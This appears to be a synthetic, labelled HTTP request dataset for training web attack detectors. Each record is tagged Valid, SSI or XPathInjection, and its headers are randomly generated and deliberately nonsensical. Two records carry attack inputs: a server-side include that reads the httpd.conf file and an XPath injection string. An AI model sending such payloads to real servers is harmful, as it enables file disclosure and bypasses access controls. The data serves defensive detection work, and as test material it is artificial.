Cookie: sd8ejpqestte=E4atetloptet=ef;oAdlfIciov=tst;sh1ynftsh=mAtuabEerihtanimes;kntlhrn1nio=bkMTVVy;41ey3=WjtlhR;ci4rh=7703174
Cookie2: $Version="843"
Date: Fri, 17 Nov 06 24:23:02 UTC
ETag: W/"FvkHj8C9bQkH4Xda@"
Expect: 100-continue
From: hhia@RXgEevnUs.cz
If-Modified-Since: Mon, 30 May 05 24:39:17 UTC
If-Unmodified-Since: Mon, 16 Apr 07 01:52:13 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Feb 08 11:11:35 UTC
Max-Forwards: 1
MIME-Version: 9.0
Pragma: 9='t8awt0'
Proxy-Authorization: Digest nc=bb347AD9
Authorization: Digest cnonce="oqlzc"
Range: 074-7647,9-,-3
Referer: /Thubrf3v.asp
TE: deflate
Trailer: Accept-Encoding
User-Agent: dR4mhpni/6.7.6
UA-CPU: StrongARM
UA-Disp: 7033,058,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 916x209
Via: 3.2 120.118.25.127
Transfer-Encoding: identity
Upgrade: aehr/3.4, ioW/9.5
Warning: 838 126.126.166.93 "ueEslae" "Tue, 30 Nov 04 21:59:39 UTC"
X-Forwarded-For: 16.106.202.140
X-Serial-Number: 149109156633944
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23951
Start - Id: 30736
class: Valid
GET /bnehotcehfaeu8h/eww/hVvI2oB/ylvjbinq8/7xt/o7_NYU-vorR/2vohonedShnof/a9i0qmffbafezICEePos/tSjKUdVazFfpMM-8Oh/nvB_sX6KAzi5@S/enaFHRb.4jzDA.html?Oriwgdtnla=761&InP4OStelnetW=+brt%2F5aonjhs&_WiGcGm-YinsertR=gaaaawmochaw%7Cla8&yservicesvE@gWRHsock_streami=sXf&3civleopti=orhil&camsetiz=yYoqw9h%3FuwinntfEE&a8gnz=o8c3soogrm%3B&bodylJrqCFRu3y9=720266053&2joiuxeiq=098551&si=lo5fpS4 HTTP/1.0
Host: 32.64.224.181:90
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, identity;q=0.6, gzip;q=0.5, compress;q=0.8, identity;q=0.1
Accept-Language: s4n-actscifg;q=0.5, rrr-osae7s;q=0.3, mrsonfls-nn9itora, hh-yao;q=0.0, obdzta-Li
Cache-Control: min-fresh=221
Client-ip: 45.133.46.216
Cookie: el0fbei=7;sforpw=am5mH;5golgrg=1
Cookie2: $Version="370"
Date: Wed, 09 Jan 08 02:13:03 GMT
ETag: W/"M9fGJXIAKHN3hNALUrgN"
Expect: nftelaPy=w6ovax;Unypkplt
From: dubt@tmrdi.net
If-Modified-Since: Wed, 19 Apr 06 11:12:27 GMT
If-Unmodified-Since: Sun, 02 Oct 05 12:05:08 GMT
If-Match: "nUATuU0Bzr396UkxQHri"
If-None-Match: "kfDflZr5NG.jI32-"
If-Range: Wed, 09 Aug 06 17:36:56 UTC
Max-Forwards: 840
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: uwea ht18Lnh=tnrantuh
Authorization: Basic c2NvbjM6b2hlcmhlcg==
Range: 4297-25184
Referer: /tsd0/eoema.nsf
TE: trailers,deflate;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.5 (X11; U; Solaris 1.0; 1t-ee; rv:9.5.7) Gecko/49695727
UA-CPU: x86
UA-Disp: 589,677,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2445x5903
Via: 9.9 243.206.182.255
Transfer-Encoding: deflate
Upgrade: uom4/0.1, suMtl/8.8
Warning: 377 www.wvan.htm "bwagas1ein0ddnsdrETi" "Fri, 03 Apr 09 09:54:02 UTC"
X-Forwarded-For: 158.68.127.255
X-Serial-Number: 567820794809201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30736
Start - Id: 39768
class: SSI
GET /sg5RwtRBqLhENGA3xa/iLlIC/ieRxejonenXere/ls_/eH0FU.msf?nbiattd=92375&6I=nhsmetasm8i&3h6doo58eeu=%3C%21--+%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&tlzl8ee=aamlhc05s7frradh6a&pREbaOPoxmlwp-=ni&EwHiCe=cePS&i4htf=efiem4SPmpIulpsj&ht4hb9mi=e0umlht9N46e&rtennnua3e=6&SLo=n+&nbpnsxsaaceaa=Wsbewxae3ko&hdocumentyj@NoVN2T=n HTTP/1.0
Host: www.ynIisiI.fr
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4;q=0.1, euc-kr;q=0.7, iso-8859-8-i;q=0.1, macintosh
Accept-Encoding: 
Accept-Language: 8-speioij, e-l;q=0.7, of2lae-aaeoblw, rC-sl;q=0.7, escss7es-Wc;q=0.5
Cache-Control: no-cache
Client-ip: 53.18.205.114
Cookie: awgrrioueon2eo=579289890;MKLiDVikR=ns;memi9ae=7267738518
Cookie2: $Version="565"
Date: Tue, 13 Sep 05 06:49:16 UTC
ETag: "KSJ1INOt62MxhbrCE"
Expect: sn1i
From: OacnDS@rtOaiEAusz.net
If-Modified-Since: Sat, 24 Jan 04 05:30:51 CET
If-Unmodified-Since: Sat, 19 Nov 05 22:44:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2634
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: gtEnur heeehodi=gaod
Authorization: m3ea a8bhgit=19sesn
Range: 42-82,601-32,-86
Referer: /cnf0t3n.wmn
TE: gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/5.5 (compatible; Konqueror/1.0; Win 9x; ahdd)
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5615x413
Via: FTP/0.5 170.138.148.203
Transfer-Encoding: deflate
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 306032992
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39768
Start - Id: 1591
class: Valid
GET /xzZbetweenscriptWVn3BSw/bsyiayrnvg/UlHqe_7/idnEnyO/bughFZhB0d_Z/s9/vgAD4Qfc3.R872.jsp?bReOs=NW8Ane4lIikouotsT&hesoaseae=rcpl+dn&Rrines=i HTTP/1.1
Host: www.nhr9g8esi.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 189.174.255.66
Cookie: sosnbsatnCee=systemsk;om8g-=54848041;EFteqmtabi=v\ohnmeNo aHidp
Cookie2: $Version="3"
Date: Sun, 20 Jun 04 01:17:56 CET
ETag: "knTGSe5R4krTx1@Te0aN"
Expect: 100-continue
From: neeaT@erIr5.org
If-Modified-Since: Tue, 09 Mar 10 18:05:53 GMT
If-Unmodified-Since: Tue, 04 Oct 05 13:10:47 GMT
If-Match: "qPo6Rp_HD8LbNiB2"
If-None-Match: *
If-Range: Fri, 06 Oct 06 12:35:56 GMT
Max-Forwards: 8730
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic cmlvNm5zOnJ0cHI=
Authorization: soie2 jhl2clx=desh
Range: -36692
Referer: http://www.h5oreosl.it/onvef7t/ye8e/bvlbes/lnnni/nlRes6.gif
TE: trailers
Trailer: Expect
User-Agent: tfrte6ve2 (if3hoJIjn; owflr7iG7)
UA-CPU: StrongARM
UA-Disp: 1710,881,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7934x8697
Via: 0.7 24.111.18.201
Transfer-Encoding: deflate
Upgrade: ris/8.4, oaNa/5.8, eftew/0.0, nig0/1.8
Warning: 673 72.154.61.36 "gnhtlcs" "Wed, 10 May 06 10:46:29 UTC"
X-Forwarded-For: 240.238.253.4
X-Serial-Number: 29285068
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1591
Start - Id: 49965
class: XPathInjection
GET /f2V/hm.u3UfKr5hIyhsx/y6dropo6D85/rrf105S3Cl_Rgzf221.msf?H.anK-=aa2ne&AsqucIhyturr=029606875&pereixgiaopeclr=sBMu1Kz9Zjnj&trts=oo9sse&nnxcbzriHe=eo&yams=00&c6acoi0=d%5Dae%5Dhnconnectf&j2yxEht=e1ir2%27+or+++++ee%2F8se5i%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D3%5D+or++++%27saliah%27++++%3D+++%27&upx3btvh=node+hi HTTP/1.1
Host: www.todielE.cz
Connection: Euntwsua
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress, deflate
Accept-Language: es-O1tgdj;q=0.9, u2vie-m, iiuspU-hJetH;q=0.8
Cache-Control: no-store
Date: Sun, 31 Oct 04 24:52:54 UTC
If-Modified-Since: Fri, 10 Oct 08 15:43:53 GMT
If-Match: "sHiQSfYOv5ma6Q5"
If-Range: "nmasJ1gXdv9n0e7Ln"
Max-Forwards: 58
Referer: http://nbios.net/6ewa5/vcRan/ew1zTtEl/teodenma.msf
User-Agent: Mozilla/7.9 (Windows; U; WinNT 2.1; 7I-5t; rv:1.6.2) Gecko/13890875
Via: eon/8.4 118.143.237.205

null

End - Id: 49965
Start - Id: 31992
class: Valid
GET /8UimgP4/7whxmlk/Ii3WfYbomXMwBw/kl4@Q7Grn/W31ePYJDamocha/hpNrELj1jQcJ/lUjM_wU0.33VrI/wh.php3?nieekkeie=tBThwNU&jtpa6ohaamdoye=execu%5Dyptusiti%274%3Dv&iewbRri=iZEk%40Z&tS=snrt%3Fw+Enn%5B&eua=9320&enxnwi3=Tcudswgetpth%26iidiHi+&z1hXuhquno7gir=octogy&GeHcJLJ=eoirpthtnh&Hf=ayT5caDtgnpj4a&tdmerb3llnote=610999522 HTTP/1.0
Host: www.slrnENdda.st
Connection: close
Accept: */*;q=0.8
Accept-Charset: euc-tw, x-mac-cyrillic, cp-936;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 131.149.91.210
Cookie: 5bxspe3eeaT=675902476
Cookie2: $Version="952"
Date: Fri, 10 Jun 05 01:27:17 GMT
ETag: W/"DoTSfxX-erxfrFD2BL5G"
Expect: 100-continue
From: aiotemos@ar4lgiownn.be
If-Modified-Since: Sat, 21 Jan 06 24:29:54 UTC
If-Unmodified-Since: Sat, 13 Oct 07 01:04:03 GMT
If-Match: *
If-None-Match: "RW1ZvVF9wqFzCu3F"
If-Range: Sun, 26 Sep 04 11:23:44 CET
Max-Forwards: 9219
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic ZHJocXJ6dTA6d3J0YWE=
Authorization: etsH5t isrblA=sicwgs
Range: -63549
Referer: /s41sue/gu5hlSa/nwaAael/tbncTkt/doa9tI.txt
TE: gzip
Trailer: Upgrade
User-Agent: irpaiUd
UA-CPU: Sparc
UA-Disp: 612,8755,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 879x932
Via: FTP/4.5 126.104.180.206:858
Transfer-Encoding: deflate
Upgrade: 6visyo/1.0, hdt/1.8, 4ehi/6.2, sunpl/0.0, EeEeca/5.7
Warning: 334 109.21.12.244 "syTthysdtcj6teaty7" "Sat, 23 Jan 10 14:32:37 GMT"
X-Forwarded-For: 241.255.67.216
X-Serial-Number: 811726
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31992
Start - Id: 27791
class: Valid
GET /ep/dwinntH5e3E3H51Ceval/yslOcag/eihK/4torp/j4access_logRLL1c/zCCndMEp1ZeXOAK2l.L.bin?iszArq=djWYqb HTTP/1.0
Host: 16.141.42.196
Connection: keep-alive
Accept: application/postscript, video/*
Accept-Charset: x-mac-arabic;q=0.2, cp-950, windows-1252, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 170.250.103.182
Cookie: dalbyemso4a=passthrudj;3rr1Hqeidsv4=y8odboot.ini;Wt5loe=inge
Cookie2: $Version="3"
Date: Fri, 06 Jun 08 23:05:42 UTC
ETag: "Wrf9b4HDRIA3AhajE6_"
Expect: 100-continue
From: omsc@oihc6.biz
If-Modified-Since: Thu, 09 Dec 04 21:51:23 CET
If-Unmodified-Since: Mon, 17 Mar 08 23:18:13 GMT
If-Match: *
If-None-Match: "ZnNYGzaA@rYdPrghAD7O"
If-Range: *
Max-Forwards: 30
MIME-Version: 9.4
Pragma: Nlasl22g='tyqTa'
Proxy-Authorization: mntnor HgotSst=Rpgnni
Authorization: nBe2uz boimn5f=y9rrsw
Range: -83593,-88
Referer: /atnm/eawsh.css
TE: trailers
Trailer: TE
User-Agent: wTqV/7.6.2
UA-CPU: x86
UA-Disp: 966,647,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 364x479
Via: HTTP/6.3 134.235.202.89, 8.5 www.w2oea.htm
Transfer-Encoding: gzip
Upgrade: dieesm/2.6
Warning: 915 www.tluon.jpeg:326 "rrne4fWsouns" 
X-Forwarded-For: 90.82.25.41
X-Serial-Number: 00771445760189664084
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27791
Start - Id: 12381
class: Valid
GET /qaaso26atqLecubRd/3nlnfVh5TrHkcKYJgcvx/Erooiln8sh7smg/_IformYnW_Vwza/ocseU/e8N5Pm/TW9r/5eSrs/niYifeLAcWaSXBx.V.html?0kctas=72&teirWeroe=aCaootfbkider&xtwys0rprs4x6=38652&oeiRb4rleio7=lois HTTP/1.1
Host: www.kmeUrtsdn.uk
Connection: close
Accept: text/*
Accept-Charset: cp-936;q=0.4, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: cnsst-uecete, euo-O
Cache-Control: only-if-cached
Client-ip: 98.43.226.106
Cookie: osra2gainsb=3thsnteimn?;esreAargswblo=P;rr] whusrO dtexecT;43seouwnfarw=rN2T06DEd;1Micaxaobms=u4q0gE_mwzTg
Cookie2: $Version="00"
Date: Sun, 11 Mar 07 02:48:00 CET
ETag: W/"xcdyGu8n9CfUFeFjthXj"
Expect: 100-continue
From: nn9ptett@eneaTr.com
If-Modified-Since: Fri, 15 Oct 04 02:16:24 UTC
If-Unmodified-Since: Fri, 13 Jun 08 19:15:00 GMT
If-Match: "fGzMjEZav.MNlxgb"
If-None-Match: *
If-Range: Wed, 30 Apr 08 24:50:08 UTC
Max-Forwards: 498
MIME-Version: 7.5
Pragma: noaotoa=0nemi9nU
Proxy-Authorization: DuJm tcmeteLj=bonrctac
Authorization: Basic ejBrdWF0YTpyTmU0Q1c4cg==
Range: -51069
Referer: http://www.Nes0asp.it/oirlSei.gif
TE: trailers,deflate
Trailer: User-Agent
User-Agent: nFstt9e/6.0.6
UA-CPU: 68000
UA-Disp: 1831,152,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8258x863
Via: haeIg/4.1 www.wh3ap6Td.jpeg, 8.2 www.ymao.js
Transfer-Encoding: deflate
Upgrade: hrA/6.7, e6zNoo/8.6, lilor/5.4, esys/7.1
Warning: 502 103.250.166.240 "Eioyinr" 
X-Forwarded-For: 15.44.254.140
X-Serial-Number: 250138591797251529
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12381
Start - Id: 27300
class: Valid
GET /gbH8.5NJY09t.shtml?ouaQ5Ve=ddregwnaoEco&eySaenrsfebor=6&rec7A=damyjmo&2hhfirsnele=rqe0ehdntd&VywOk=CN&orhjbrcot=ofK.Ki HTTP/1.0
Host: 146.232.142.202
Connection: keep-alive
Accept: image/png, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: iEii3y7-daenrnxT;q=0.0, eDn9-Iot
Cache-Control: max-age=05
Client-ip: 191.18.69.14
Cookie: 9wzanzCb=0693369;oorHu4Sr=3;taaesynooVso=?Llsfp;ncl9Too=ya;5tj6eaka=mi+
Cookie2: $Version="63"
Date: Wed, 10 Mar 10 01:03:46 GMT
ETag: "_wrVJwBLFAB1y_jnloUz"
Expect: scoseh2c=euIrtieh;stig
From: mcg3o@vtaesty.com
If-Modified-Since: Sun, 02 May 10 24:53:34 UTC
If-Unmodified-Since: Tue, 28 Dec 04 11:52:10 CET
If-Match: *
If-None-Match: "B6IGT04sxI6fCRoC1-P."
If-Range: Sun, 29 Oct 06 18:54:03 CET
Max-Forwards: 29
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM cGxzckZBc2JjYXVDYTljMXNldXJhaXU1cnl0aGluYmVzY1J0ZHNwc24=
Authorization: Digest cnonce="yrmhni"
Range: 66063-2335,-09970
Referer: /ihnt/smG3/oaaeet/4eucer.php3
TE: chunked,trailers,trailers
Trailer: Via
User-Agent: Mozilla/6.2 (Windows; U; Win98 6.2; nn-eZ; rv:3.8.6) Gecko/82003955
UA-CPU: 68000
UA-Disp: 3109,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6912x6352
Via: 2.0 224.232.11.39
Transfer-Encoding: gzip
Upgrade: Eraaa/3.4, o7dr/1.3, si09Hb/5.7
Warning: 650 139.231.175.172 "eiohyeeedPe" 
X-Forwarded-For: 50.59.239.169
X-Serial-Number: 75164077038098175
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27300
Start - Id: 28855
class: Valid
GET /twh/ehbUYtP/Amaeq1Zacd/itetp7atTitn9hdhoHp/pkCR/drthnmesOo8wjTa/wl/gnertcusrbt1ag/hgakaKrdrelowe3/wed4sqtettiai/Otni8cera.sh?oMOimgDm5WjP=csMqZ&lwSs@q=80166&veE0fdiaautsln=%2B&HqR@sdMR=4t&q80CquOK=7984&na=eserbi&rtnresDeag=388&coteyv=Hre2arulltTeai&td=s_EMnUz HTTP/1.1
Host: 249.92.195.143:04
Connection: otiiha
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, gzip;q=0.0, compress;q=0.1, gzip, identity
Accept-Language: *;q=0.1
Cache-Control: max-age=09
Client-ip: 54.76.144.41
Cookie: ptoojrpaaahwe=3878;fgdwhemRiTuwogu=l0rBPGIa0WX;5aihbbNuu=mg3/;IdhraoaiMk=nSdTzr;uelcnsaonBuH9s=766214129;M2xmlpIgr=2584397
Cookie2: $Version="434"
Date: Sun, 07 Dec 08 05:25:20 CET
ETag: W/"IHA-3nrxci2TQoRq0U"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Sun, 03 Jun 07 09:48:31 GMT
If-Unmodified-Since: Sat, 01 Mar 08 23:42:53 CET
If-Match: *
If-None-Match: "HabrnB.L2BOjyfFL"
If-Range: Tue, 25 Dec 07 01:36:13 GMT
Max-Forwards: 772
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM dHNidXVyaXdwYW5lZW1wMG9hbnJ5UnFoOHYyYzhlaGRsdGFh
Authorization: Basic bmhoa1F0a2k6c3N0b2M=
Range: -0,-10
Referer: /jTdL.conf
TE: deflate
Trailer: If-Modified-Since
User-Agent: yononnR6zW/8.7.3.5
UA-CPU: x86
UA-Disp: 246,885,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 122x5513
Via: HTTP/1.7 151.137.117.19, FTP/5.0 www.Ete7.jpeg
Transfer-Encoding: compress
Upgrade: utaps/8.7, onEusT/9.3
Warning: 922 www.ubnuse.css:110 "dtop6Gueohos2s9" 
X-Forwarded-For: 102.241.28.31
X-Serial-Number: 687925565922143
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28855
Start - Id: 10719
class: Valid
GET /d.passwdIhome8eY7.aspx?coohswkcfew=46&ocrEi=access_log&beeeem=5L2teraaRiaaiQb5eo&colskesbnnxbarE=fkeotzhmarza&krudttT=57430&B2je=fWC8&dnn9=86787&emDncyslse=llg&p8=o7group+byain&wes04s8qe=o8phpByier7 HTTP/1.0
Host: 166.29.237.24
Connection: close
Accept: text/plain, text/plain;q=0.3, application/rtf;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 150.14.84.164
Cookie: ieyybE8q=s9sIhftdaxH;ocr=151134655;inzeeiw=fatey5'psanese
Cookie2: $Version="2"
Date: Wed, 29 Aug 07 03:25:15 GMT
ETag: "WUg9JirefD8v_q3MzuXi"
Expect: hsihttha=eaoota
From: s0rd3uti@drb2i.uk
If-Modified-Since: Fri, 04 Jan 08 04:25:46 UTC
If-Unmodified-Since: Thu, 11 Feb 10 20:14:34 GMT
If-Match: *
If-None-Match: *
If-Range: "oJPbZIMcyvOGl1AA"
Max-Forwards: 6580
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dHUwZWxubGV3dXZpaWFlbm1wYW5hbHRtcU9iMmJzbmVyYWlzN2hhYWFlU3A0ZXBo
Range: 02-95
Referer: http://www.lReagNuE.fr/oy5ba/aelaoxgl/dcarlr/aigH.pl
TE: deflate;q=0.8
Trailer: If-Range
User-Agent: Mozilla/1.7 (X11; U; Unix 9.5; 9s-hl; rv:9.0.3) Gecko/34228580
UA-CPU: x86
UA-Disp: 592,9913,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 060x417
Via: FTP/0.8 124.227.95.238, HTTP/4.7 www.uneemi4t.js
Transfer-Encoding: identity
Upgrade: ETte/9.1, etn7/6.6, nash/0.2, ssIaTe/4.2
Warning: 426 117.201.51.141 "WtatHstet1tscTat" 
X-Forwarded-For: 119.229.255.152
X-Serial-Number: 49435441340126
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10719
Start - Id: 32095
class: Valid
GET /4Zi0x/iCQuqDjLoKAjbAccx/ogwzVKRKEc/bx/arg5w.ln.pl?iooN=mcsEt&xeDvbhrm=86&WL9Pacceptvnodexml2Rkscript=3tcnrtrrcutEcb&iNArssoEea=btqaqimTatt%7Exp_lr%5C&hrlexeco=7ahoin2&XsystemIRX5D4-=bX4jSHCy3BjN&eaoro=2776463&ineyeh=erfE&rgl4ismnoda=8739&b.Bnph-AEEeval4s=+deleteselectnrc%2F+&gss2ess9S9sp7=0562&L0GTEhFwinntwL=3131536 HTTP/1.0
Host: 41.248.23.2
Connection: geydreut
Accept: */*
Accept-Charset: windows-1251;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 58.206.49.189
Cookie: ursjhr=218;ohw5fi6ge=7@2iw;EdeleteiiHE=5etusru;osMhchhabiepsii=604961;@documentgroup bycopyQA=c8e;1ou8gAsehasmflS=liR1ETmtgN-D
Cookie2: $Version="102"
Date: Sat, 18 Oct 08 17:54:33 UTC
ETag: "y3@gLs9ULo87Ao1pqC"
Expect: reqoai
From: eeej3@loctMytno.org
If-Modified-Since: Sun, 15 Jul 07 08:14:50 CET
If-Unmodified-Since: Wed, 11 Feb 04 17:11:31 CET
If-Match: *
If-None-Match: "jf49Hz5u09jEzCQG.Wl"
If-Range: *
Max-Forwards: 6493
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Basic cmE3Yzp5YW9kbA==
Range: 130281-,-02625
Referer: http://www.tnlmdu.uk/phieg/irngee/vhAEa/ertjboea.mp3
TE: trailers,trailers,gzip;q=0.8
Trailer: Referer
User-Agent: ewneets98uwplh8nds
UA-CPU: 68000
UA-Disp: 702,413,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 367x7496
Via: HTTP/3.1 www.8ieaxi4.html
Transfer-Encoding: odh8; 5enoa17=oeue
Upgrade: 7esxrt/2.4, oead/7.0, rsiaa/4.4, rte8e/6.3
Warning: 004 www.catate.tiff "0rpajihlso" "Sat, 13 Jan 07 04:30:39 CET"
X-Forwarded-For: 15.97.140.41
X-Serial-Number: 4047270
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32095
Start - Id: 18467
class: Valid
GET /QMWUrB4/swKuBB/orYlJ/huexis/8lrnsa/tlage/orgE@I@8CWlX0/eeoaeeate/lm4Nerktodsuoga/_I9/ygTPAotkpvn/wncyimi2ois9lhw.sh? HTTP/1.1
Host: 253.26.53.92
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-1251, windows-1257, windows-1257, iso-8859-6;q=0.8
Accept-Encoding: 
Accept-Language: 7llsts-lbrtec, uywrnyyr-N;q=0.9, Eamrt-O019b;q=0.4
Cache-Control: max-stale=121
Client-ip: 217.249.31.231
Cookie: R3Rkclsihieist=3LOQ;tbzatee=57;rmaiossdkcTuO=57;1nacnr0eh=55507248;iiusrh5wz=ttgterwetiusn
Cookie2: $Version="20"
Date: Wed, 06 Jul 05 03:35:29 CET
ETag: "ieWN9rxKmZnfffV"
Expect: 100-continue
From: ee1e@sacey.de
If-Modified-Since: Wed, 04 Mar 09 10:08:17 UTC
If-Unmodified-Since: Mon, 23 Mar 09 18:41:50 GMT
If-Match: *
If-None-Match: "2Hlyt.yjZBaQJTRlt"
If-Range: "C2JVHl8ZVPfAP15"
Max-Forwards: 59
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: mdtspE NmaFtM=lagctp
Authorization: Basic bzRucHR0OkNleGN3
Range: 72-79
Referer: /enaiso/fesbNbg/gdsi.aspx
TE: trailers,trailers
Trailer: Via
User-Agent: jncwdtd (7sHG5_0oi; 1Tqz8RkU)
UA-CPU: PowerPC
UA-Disp: 454,2139,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: emT/2.8 96.19.119.225, 2.6 185.119.187.216:030
Transfer-Encoding: gzip
Upgrade: nddn/2.1, t05a/5.1, sKs/3.2, 0Ien/4.5, hta/3.8
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 110.33.123.65
X-Serial-Number: 63866719
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 18467
Start - Id: 28202
class: Valid
GET /e2ne@/t4ea1o4tiuipostg/iiwzB1N-sB7gSvnK6Aw/a8ZhccGN1SaK-auJP0hY/efb8lw732t9sB_m6IjW/wirttoh8y/-LZUTu7LC.html?3inserttf4VMdocumentfOdiv=ea%5C&oaatdhaoid=en&mex=rbodyia&hsfc8ge=+X+n&GCrbD=rsGmeSHwiuol1mecT&ysa=82 HTTP/1.1
Host: www.irdjiake.ch:80
Connection: alkhw7s6
Accept: audio/*, application/zip;q=0.5, audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: dn-fi;q=0.1, niUtrna-wrtnezry;q=0.2, rea0uZes-1tU
Cache-Control: min-fresh=32
Client-ip: 77.246.132.182
Cookie: h47InUEL_G=0;ciohidkselhai=4176411
Cookie2: $Version="225"
Date: Wed, 01 Aug 07 21:47:47 UTC
ETag: "HAKS-GZxAfZFJzHFo@3"
Expect: 100-continue
From: ldbonaa@rtlruedpi.uk
If-Modified-Since: Tue, 05 Apr 05 01:20:08 CET
If-Unmodified-Since: Mon, 13 Jun 05 11:53:45 UTC
If-Match: "_7fWVq9BYDnJ@hWs"
If-None-Match: *
If-Range: "y7E97RoOUAkGAAjX"
Max-Forwards: 850
MIME-Version: 2.3
Pragma: deslue='iee20'
Proxy-Authorization: Digest opaque="lesgG"
Authorization: Digest nc=8a8Ecac7
Range: -569,-376,5-
Referer: /eama.exe
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.8 (compatible; MSIE 2.2; Mac OS X; flxaad94r; eeEl; f5opomr)
UA-CPU: StrongARM
UA-Disp: 7874,6904,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8070x456
Via: HTTP/8.3 58.34.1.36:72, 5.4 www.heleh.htm, 3.1 67.72.12.121:3801
Transfer-Encoding: gzip
Upgrade: icst/6.9
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 045641430
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28202
Start - Id: 3052
class: Valid
GET /09bi8hnahlc/hsoy/p-wppTLCdKB/0yYxmlZNIATmmD.aspx?snd=ihEr%40 HTTP/1.0
Host: www.ovegtb8.de
Connection: Tnns
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.8
Cache-Control: min-fresh=44693
Client-ip: 198.112.74.209
Cookie: ermiu=7008;rsStdyeCcemHoB=cAeeos6tagsena7oz;h5etsandkoi4dt=886;shitk9sqi=5630937
Cookie2: $Version="178"
Date: Fri, 20 Aug 04 05:47:59 GMT
ETag: "crMP5i9mU1Pqg93G"
Expect: yepnctt
From: clms@lki1al.be
If-Modified-Since: Wed, 12 May 04 04:35:29 GMT
If-Unmodified-Since: Fri, 01 Feb 08 18:30:37 UTC
If-Match: "K96YD0eh7JzTLhDQMrXE"
If-None-Match: *
If-Range: Fri, 26 Aug 05 15:07:47 GMT
Max-Forwards: 3321
MIME-Version: 6.8
Pragma: iorj='rx5rtn'
Proxy-Authorization: In9tm esfisSbg=dzra31hx
Authorization: Digest nc=4feCA57d
Range: -723116,-970,848683-
Referer: http://jt4A.be/fsemr/ittaals/anNEnhcn.swf
TE: chunked,gzip,deflate
Trailer: Trailer
User-Agent: Mozilla/3.9 (Windows; U; WinNT 5.3; ui-pl; rv:7.1.0) Gecko/31592710
UA-CPU: PowerPC
